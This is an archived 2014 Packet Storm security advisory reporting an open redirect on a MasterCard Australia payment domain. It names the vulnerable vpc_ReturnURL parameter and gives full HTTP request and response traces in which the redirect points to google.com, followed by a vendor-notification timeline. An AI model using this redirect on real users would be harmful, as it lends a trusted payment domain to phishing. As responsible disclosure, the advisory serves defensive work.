exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MasterCard Open Redirect

MasterCard Open Redirect
Posted Jul 28, 2014
Authored by Anastasios Monachos

MasterCard.com.au suffers from an open redirect vulnerability.

tags | exploit
SHA-256 | 17091aa154924d37cfd73e3daf265786342f19af4f9ee46ad81527ff34d612aa

MasterCard Open Redirect

Change Mirror Download
=======================================================================
MasterCard - Open Redirect
=======================================================================

Affected Domain : mastercard.com.au
Local/Remote : Remote
Severity : Very Low
Vulnerable URL : https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://<any_domain>
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]

[Summary]

Certain unspecified input is not properly verified before being used. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

[Vulnerability Details]

GET Request:
------------
GET https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://www.google.com HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET Response:
-------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:26:51 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Set-Cookie: PAY4939831625825013779=PAY8CA6985107791A1B572838CBB73CF5D3; Path=/; Secure
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:56:51 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

Follow up GET Request I:
------------------------
GET https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response I:
-------------------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:27:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:57:10 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: http://www.google.com?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

GET follow up Request II:
-------------------------
GET http://www.google.com/?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response II:
--------------------------
HTTP/1.1 302 Found
Location: http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 May 2014 12:27:41 GMT
Server: gws
Content-Length: 258
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg">here</A>.
</BODY></HTML>


[Time-line]

23/06/2014 - Advisory created
23/06/2014 - Mastercard notified: no response
25/06/2014 - Vendor contacted again - different department: no response
08/07/2014 - Re-contacted both departments: no response
27/07/2014 - Advisory published
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close